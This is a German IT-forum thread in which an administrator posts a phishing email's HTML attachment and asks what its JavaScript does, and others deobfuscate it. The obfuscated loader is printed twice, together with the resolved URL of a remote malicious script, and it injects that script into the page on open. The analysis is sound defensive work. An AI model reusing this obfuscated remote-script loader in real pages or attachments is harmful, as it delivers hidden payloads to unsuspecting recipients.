6
Seltsamer Javascript-Code in Phishing-Mail
Moin Zusammen,
ich habe vorhin die E-Mail Quarantäne unseres Unternehmens durchgeschaut, um mögliche false-positives zustellen zu lassen. Soweit nichts spannendes.
Eine E-Mail ist mir dabei allerdings ins Auge gesprungen, welche eine HTML-Datei enthält. Soweit so schlecht. Trotzdem war ich so dumm und habe mit der Überzeugung, dass dort "nur" ein Fake-Formular zur Eingabe von Login-Informationen drin ist, den Anhang geöffnet. Auf der Seite war ein Lorem-Ipsum-artiger Text, welcher keinen Sinn ergab. Anschließend habe ich die E-Mail noch einmal in Notepad++ geöffnet, weil ich wusste, dass die Website somit etwas versucht im Hintergrund auszuführen.
Versteht jemand, was der Java-Code unten in der E-Mail macht? Ist natürlich schlau "versteckt" durch die unsinnigen Variablennamen.
PS: Oben das xxxxxxx.de stammt von mir. Ich habe dort eine Information ersetzt.
Schon mal vielen Dank
.
Grüße
Tristan
ich habe vorhin die E-Mail Quarantäne unseres Unternehmens durchgeschaut, um mögliche false-positives zustellen zu lassen. Soweit nichts spannendes.
Eine E-Mail ist mir dabei allerdings ins Auge gesprungen, welche eine HTML-Datei enthält. Soweit so schlecht. Trotzdem war ich so dumm und habe mit der Überzeugung, dass dort "nur" ein Fake-Formular zur Eingabe von Login-Informationen drin ist, den Anhang geöffnet. Auf der Seite war ein Lorem-Ipsum-artiger Text, welcher keinen Sinn ergab. Anschließend habe ich die E-Mail noch einmal in Notepad++ geöffnet, weil ich wusste, dass die Website somit etwas versucht im Hintergrund auszuführen.
Versteht jemand, was der Java-Code unten in der E-Mail macht? Ist natürlich schlau "versteckt" durch die unsinnigen Variablennamen.
<html lang="en">
<head>
<meta charset="utf-8">
<link href="/static/css/bootstrap.min.css" rel="stylesheet">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<!-- Bootstrap core CSS -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.3/jquery.min.js"></script>
<title>xxxxxxx.de</title>
<link href="/static/font-awesome/css/font-awesome.min.css" rel="stylesheet">
</head>
<body>
<p>Culpa illo dolor a qui. A neque veritatis deserunt illum nesciunt non ab. Saepe eum eos possimus consequatur dolores quo. Voluptate esse corrupti aut consequatur omnis.</p>
<p>Ut atque inventore quis officia. Enim nobis ratione repellat labore. Quia autem sit iure mollitia eaque architecto. Repellat et nam itaque beatae illum porro dolore. Dolor est sint provident itaque.</p>
<p>Dolores ducimus et ipsum quia incidunt. Incidunt ullam rerum eligendi quo. Voluptates iste exercitationem culpa laborum quod. Voluptates dignissimos praesentium est sit quidem sed natus ut.</p>
<p>Aut harum iure ut. Enim animi velit sequi similique quo nesciunt tempora. Veritatis voluptates dolor et voluptatem maiores labore quo.</p>
<p>Libero nulla et culpa dolorem nam aut temporibus maiores. Aperiam veniam cum dolores quia iusto velit perferendis.</p>
<p>Aliquam sunt iste sed deleniti. Quae dignissimos est qui enim architecto. Esse porro iste aut quas sunt necessitatibus. Nulla voluptas incidunt et ea.</p>
<p>Consequatur ullam id sapiente et id. Voluptatem laudantium rem sit excepturi pariatur. Et voluptas corrupti unde dolorem tenetur ut. Qui aut tenetur dolorem ut blanditiis qui.</p>
<p>Praesentium quo autem non cupiditate. Modi quia fugiat dolorem qui. Nemo consectetur facilis aut repudiandae esse sed dolor.</p>
<p>Inventore at est suscipit. Praesentium adipisci ut qui laudantium incidunt. Iste nesciunt perferendis reiciendis earum. In officiis repellendus ratione corrupti ipsa ipsa voluptatibus ut.</p>
<p>Quibusdam dolorem magnam quisquam laborum nihil. Ut animi rerum quam perferendis. Qui a perferendis autem dolorum. Sunt laudantium omnis qui suscipit.</p>
<p>At eligendi adipisci voluptatum nulla accusantium. Sint dolores in dicta autem illo tempora fugit numquam. Ipsa a dicta blanditiis labore optio blanditiis culpa. Est et dolores magnam dicta.</p>
<p>Optio nobis magnam et et voluptatum eligendi dolores et. Iure magni est illo accusantium nihil sint unde possimus. Incidunt voluptas qui aut repudiandae.</p>
<p>Est ullam neque excepturi qui at occaecati. Dolor magnam dolor est. Minima saepe ut id atque architecto amet quas.</p>
<p>Autem excepturi in officiis dolorum doloribus quod eos nesciunt. Voluptatem quasi fuga dicta. Ipsam incidunt inventore cumque reprehenderit quasi.</p>
<p>Itaque et est fuga eveniet magnam. Soluta adipisci eveniet laboriosam reiciendis pariatur.</p>
<p>Adipisci totam accusamus ea minima est aut est. Animi corrupti autem corporis illo et. Occaecati unde sunt iure adipisci temporibus. Nobis voluptatibus quae eos et laborum ut.</p>
<p>In laboriosam quae atque dolorem error consequatur ut ab. Nemo dolorem ut esse ut. Mollitia eos mollitia numquam aliquid a. Adipisci aut molestiae incidunt adipisci et voluptas voluptatibus.</p>
<p>Provident molestias ea soluta sint architecto. Sed ratione aspernatur nisi mollitia voluptas et non. Officiis officia necessitatibus ex minus. Mollitia iste omnis molestiae praesentium.</p>
<p>Libero voluptatibus eos delectus animi tempore. Magni rerum illo voluptatem asperiores. Vel exercitationem illum quia in quae quis provident. Vero aut nihil non provident temporibus recusandae.</p>
<p>Iste voluptatem dolor veritatis. Ducimus id quis adipisci voluptas asperiores accusantium. Et ut qui alias molestias. A qui qui dolore et eveniet dolorem aut.</p>
<p>Aut excepturi ut labore nisi. Dolorum non id harum repudiandae. Dolor esse minima ipsum maxime ratione eaque facilis. Perferendis sequi illo dolorem et aut voluptatum sit.</p>
<p>Minima odio quod recusandae commodi. Consectetur id rerum dolores dolore. Consequuntur et facilis similique. Veniam cumque corrupti cum reprehenderit exercitationem.</p>
<p>Libero corrupti minima consequuntur nostrum. Voluptatem fugit illum autem ea et qui eveniet. Vel minima aut rerum dolorum culpa quod.</p>
<p>Perspiciatis fugit voluptas id voluptas omnis aliquid dolorum. Animi molestiae corporis commodi quaerat earum. Repellat aut animi dolores vero nam.</p>
<p>Ut occaecati porro eveniet ducimus saepe. Delectus ipsum veritatis placeat rerum adipisci. Sunt quis quidem doloribus molestiae.</p>
<p>Perferendis ut similique autem et quia voluptas. Quis et perspiciatis eos nihil qui recusandae minus. Molestiae non aut distinctio et porro odio saepe. Et sit molestiae exercitationem iste.</p>
<p>Corrupti tempore et qui eum modi consequatur. Aliquid beatae dicta modi omnis voluptas. Quia qui quidem excepturi aut delectus aliquid. Vel ut corporis quam non ut rem incidunt rem.</p>
<p>Facilis corrupti atque iusto adipisci blanditiis omnis fuga. Sed et exercitationem quisquam doloremque repellat quidem. Quod quia voluptas quaerat iure.</p>
<p>Debitis nulla quia non at accusantium et. Adipisci magnam ut ut ipsam neque accusantium. Laborum repellendus et rerum voluptate minus qui laborum. Incidunt corrupti in distinctio.</p>
<p>Quidem natus ab eveniet ut qui quis et. Pariatur corrupti quae et culpa sint nulla suscipit. Officia non consequatur doloribus non qui molestiae.</p>
<p>Dolores autem quae impedit exercitationem unde adipisci qui amet. Eaque ex laborum dolore blanditiis sit molestias explicabo. Dolores architecto excepturi eum voluptate.</p>
<p>Omnis atque iste consectetur illum enim aliquam. Error esse laborum quia laborum id labore. Voluptatibus est hic ut pariatur.</p>
<p>Ab laudantium facilis excepturi culpa excepturi facilis aut repellendus. Aut atque minus assumenda. Laudantium et hic harum unde debitis porro voluptatem.</p>
<p>Molestiae omnis sit molestiae sit praesentium recusandae. Quisquam natus temporibus eaque labore unde. Unde ea sit aspernatur harum. Reprehenderit non voluptas qui odio.</p>
<p>Et vel dolor magnam eum ipsum. Ipsam libero atque corporis adipisci rem excepturi ipsum.</p>
<p>Eligendi quia in et. Blanditiis et soluta unde maxime aut id qui ut. Voluptatibus velit aut ut voluptas.</p>
<p>Commodi sint voluptate sit sunt pariatur. Natus hic eos molestias. Minima maxime voluptatem molestiae consequatur esse natus et. Voluptatum quibusdam impedit et molestiae eius et eius illum.</p>
<p>Molestiae similique tempora reiciendis nostrum. Tempore vel dolorem sit hic voluptatum suscipit iure.</p>
<p>Illo explicabo ab nobis sunt quae. Est saepe explicabo doloribus est. Quisquam qui eos laborum magni est ducimus. Et consequuntur unde adipisci maxime doloribus.</p>
<p>Mollitia repellat facilis doloribus ut nihil odio ratione. Labore et odit qui enim mollitia placeat saepe. Et doloremque atque vel nemo ea. Pariatur dolorem illum quidem et dolorem ut.</p>
<p>Minus quis qui aut ratione aut ducimus. Vero molestias nihil quia omnis iure consequatur. Qui sed perferendis animi. Quibusdam et aliquid voluptatem sit veniam. Magnam cum voluptas molestiae a nobis.</p>
<p>Ex esse a temporibus molestias ullam at ducimus ut. Rerum enim eos quo laboriosam. Pariatur voluptas enim aut expedita. Ducimus molestiae et officia facere neque aspernatur perferendis.</p>
<p>Voluptatem repellat odio aut consectetur voluptatibus. Perferendis nostrum laboriosam laboriosam. Assumenda sed atque velit est. Consequatur doloremque ex explicabo consectetur fugiat doloremque in.</p>
<p>Consequatur aliquid laborum sint quos ex. Architecto veritatis ut totam adipisci. Qui voluptatem dolor delectus voluptas ut.</p>
<p>Iusto cumque molestiae non omnis est. Inventore dolores impedit nulla et cumque assumenda et maiores. Occaecati rem delectus atque corporis quo.</p>
<p>Quos deleniti molestias veritatis optio. Iusto unde magnam autem enim facere voluptatem.</p>
<p>Modi sint voluptas quibusdam ea nisi quibusdam eligendi. Inventore doloribus id esse quis deserunt. Perspiciatis fuga quo unde amet dolores. Culpa nesciunt architecto odit aut.</p>
<p>Necessitatibus magni ducimus vero minus quas ea. Molestiae voluptas officia qui voluptatem voluptates omnis. Ut sed voluptatum recusandae optio odio at voluptatibus.</p>
<p>Occaecati neque dolorem dolores temporibus ea velit qui. Et harum voluptas qui at. Neque nihil voluptatibus hic ab assumenda et.</p>
<p>Dolores qui dolor sequi ut beatae. Est et facilis voluptatem suscipit et aut. Cum molestiae deleniti omnis illo perspiciatis nihil illum.</p>
<p>Illum architecto tempora molestias aliquid eum facere. Consequatur enim hic dolorum suscipit dolor. Est pariatur vel est ullam qui.</p>
<p>Minus repellendus nisi ratione quidem voluptate. Quas veritatis aut qui consequatur doloremque voluptatem.</p>
<script type="text/javascript">
function a0eduneisuq(iironmisnvnsgioeesdt,eduneisuq){var tisvel=a0iironmisnvnsgioeesdt();return a0eduneisuq=function(udossualiqobr,aeefrcut){udossualiqobr=udossualiqobr-0xe3;var durtfnerpeeis=tisvel[udossualiqobr];return durtfnerpeeis;},a0eduneisuq(iironmisnvnsgioeesdt,eduneisuq);}var a0iuqihlno=a0eduneisuq;function a0iironmisnvnsgioeesdt(){var smearnmrutptoo=['1NSYhlm','105edsxUg','head','2040uiBABC','http://newzblog','1310498LxPunV','321114MhHMuY','3771IOrEPD','3072bFaCaM','/tuba.js?20023','script','2410NItzLL','5359200SHikHi','2309527pvhOfC','36QdSaCw','appendChild','8vMTVth','src'];a0iironmisnvnsgioeesdt=function(){return smearnmrutptoo;};return a0iironmisnvnsgioeesdt();}(function(tisvel,udossualiqobr){var rcmaommtpoieod=a0eduneisuq,aeefrcut=tisvel();while(!![]){try{var durtfnerpeeis=-parseInt(rcmaommtpoieod(0xe9))/0x1*(-parseInt(rcmaommtpoieod(0xef))/0x2)+-parseInt(rcmaommtpoieod(0xea))/0x3*(-parseInt(rcmaommtpoieod(0xe5))/0x4)+-parseInt(rcmaommtpoieod(0xec))/0x5*(-parseInt(rcmaommtpoieod(0xf1))/0x6)+-parseInt(rcmaommtpoieod(0xee))/0x7*(-parseInt(rcmaommtpoieod(0xe7))/0x8)+-parseInt(rcmaommtpoieod(0xf0))/0x9*(parseInt(rcmaommtpoieod(0xf4))/0xa)+parseInt(rcmaommtpoieod(0xe4))/0xb+-parseInt(rcmaommtpoieod(0xe3))/0xc;if(durtfnerpeeis===udossualiqobr)break;else aeefrcut['push'](aeefrcut['shift']());}catch(eetapmvuttlo){aeefrcut['push'](aeefrcut['shift']());}}}(a0iironmisnvnsgioeesdt,0x358e0));var sapiente=document['createElement'](a0iuqihlno(0xf3));sapiente[a0iuqihlno(0xe8)]=a0iuqihlno(0xed)+'zart589.cf/tuba'+a0iuqihlno(0xf2),document[a0iuqihlno(0xeb)][a0iuqihlno(0xe6)](sapiente);
</script>
</body>
</html>PS: Oben das xxxxxxx.de stammt von mir. Ich habe dort eine Information ersetzt.
Schon mal vielen Dank
.Grüße
Tristan
Share on Facebook
Share on Twitter
Share on Reddit
Share on LinkedinPlease also mark the comments that contributed to the solution of the article
Content-Key: 6390535342
Url: https://administrator.de/contentid/6390535342
Printed on: May 20, 2024 at 16:05 o'clock
6 Comments
Latest comment
Moin.
Das Skript bindet ein weiteres Skript-Element von folgender Adresse in das Dokument per "createElement" ein:
Die Domain ist aber schon in den einschlägigen Phishing Listen geblockt und auch nicht mehr erreichbar ..
Cheers briggs
Das Skript bindet ein weiteres Skript-Element von folgender Adresse in das Dokument per "createElement" ein:
http://newzblogzart589.cf/tuba/tuba.js?20023Cheers briggs
1
Hi,
formatiert sieht das so aus:
Ich denke mal es wird die URL:
aufgerufen (per appendChild). Kann sein das die URL noch etwas länger ist.
Auf jeden Fall ist es eine Phishing-Mail
Gruß
@firefly
formatiert sieht das so aus:
function a0eduneisuq(iironmisnvnsgioeesdt, eduneisuq) {
var tisvel = a0iironmisnvnsgioeesdt();
return a0eduneisuq = function (udossualiqobr, aeefrcut) {
udossualiqobr = udossualiqobr - 0xe3;
var durtfnerpeeis = tisvel[udossualiqobr];
return durtfnerpeeis;
}, a0eduneisuq(iironmisnvnsgioeesdt, eduneisuq);
}
var a0iuqihlno = a0eduneisuq;
function a0iironmisnvnsgioeesdt() {
var smearnmrutptoo = ['1NSYhlm', '105edsxUg', 'head', '2040uiBABC', 'http://newzblog', '1310498LxPunV', '321114MhHMuY', '3771IOrEPD', '3072bFaCaM', '/tuba.js?20023', 'script', '2410NItzLL', '5359200SHikHi', '2309527pvhOfC', '36QdSaCw', 'appendChild', '8vMTVth', 'src'];
a0iironmisnvnsgioeesdt = function () {
return smearnmrutptoo;
};
return a0iironmisnvnsgioeesdt();
}
(function (tisvel, udossualiqobr) {
var rcmaommtpoieod = a0eduneisuq, aeefrcut = tisvel();
while (!![]) {
try {
var durtfnerpeeis = -parseInt(rcmaommtpoieod(0xe9)) / 0x1 * (-parseInt(rcmaommtpoieod(0xef)) / 0x2) + -parseInt(rcmaommtpoieod(0xea)) / 0x3 * (-parseInt(rcmaommtpoieod(0xe5)) / 0x4) + -parseInt(rcmaommtpoieod(0xec)) / 0x5 * (-parseInt(rcmaommtpoieod(0xf1)) / 0x6) + -parseInt(rcmaommtpoieod(0xee)) / 0x7 * (-parseInt(rcmaommtpoieod(0xe7)) / 0x8) + -parseInt(rcmaommtpoieod(0xf0)) / 0x9 * (parseInt(rcmaommtpoieod(0xf4)) / 0xa) + parseInt(rcmaommtpoieod(0xe4)) / 0xb + -parseInt(rcmaommtpoieod(0xe3)) / 0xc;
if (durtfnerpeeis === udossualiqobr) break; else aeefrcut['push'](aeefrcut['shift']());
} catch (eetapmvuttlo) {
aeefrcut['push'](aeefrcut['shift']());
}
}
}(a0iironmisnvnsgioeesdt, 0x358e0));
var sapiente = document['createElement'](a0iuqihlno(0xf3));
sapiente[a0iuqihlno(0xe8)] = a0iuqihlno(0xed) + 'zart589.cf/tuba' + a0iuqihlno(0xf2), document[a0iuqihlno(0xeb)][a0iuqihlno(0xe6)](sapiente); Ich denke mal es wird die URL:
http://newzblogzart589.cf/tuba/tuba.js?20023aufgerufen (per appendChild). Kann sein das die URL noch etwas länger ist.
Auf jeden Fall ist es eine Phishing-Mail
Gruß
@firefly
2
Hi briggs,
dann bin ich ja schon mal beruhigt, danke dir ;).
Trotzdem unschön, dass so viele Mails mit diesem Anhang eingetroffen sind.
Grüße
Tristan
dann bin ich ja schon mal beruhigt, danke dir ;).
Trotzdem unschön, dass so viele Mails mit diesem Anhang eingetroffen sind.
Grüße
Tristan
Quasi Grundrauschen was man direkt mit seinem Mailserver in der Tonne entsorgt .
.1
Hi firefly,
auch dir danke.
Die Domain ist zum Glück nicht erreichbar, so dass das Script tuba.js nicht nachgeladen werden konnte.
Grüße
Tristan
auch dir danke.
Die Domain ist zum Glück nicht erreichbar, so dass das Script tuba.js nicht nachgeladen werden konnte.
Grüße
Tristan
Das Hauptproblem bei solchen Mails ist. das manche User sich in jedewede Mailingliste eintragen...
Ein anderes sind generische Mail-Adressen wie info@, service@, order@ und so weiter, die von Spam-Versendern beliebt sind ...
Man kann nur jeder Firma und jedem privat empfehlen, solche Adressen nicht zu verwenden, den Empfang abzulehnen ...
Ich persönlich habe seit 2003 für jedes Forum oder so stwo eine Alias-Adresse ...
... heißt, wenn eine Spam-Mail reinkommen sollte, was in den 20 Jahren vielleicht 5 mal so war, weiß ich. wo die eMail-Adresse verbrannt ist und kann sie ersetzen ...
OK, man muss einen Passwortmanager nutzen zur Verwaltung, aber das war bisher minimal zum nutzen ...
.
Ein anderes sind generische Mail-Adressen wie info@, service@, order@ und so weiter, die von Spam-Versendern beliebt sind ...
Man kann nur jeder Firma und jedem privat empfehlen, solche Adressen nicht zu verwenden, den Empfang abzulehnen ...
Ich persönlich habe seit 2003 für jedes Forum oder so stwo eine Alias-Adresse ...
... heißt, wenn eine Spam-Mail reinkommen sollte, was in den 20 Jahren vielleicht 5 mal so war, weiß ich. wo die eMail-Adresse verbrannt ist und kann sie ersetzen ...
OK, man muss einen Passwortmanager nutzen zur Verwaltung, aber das war bisher minimal zum nutzen ...
.
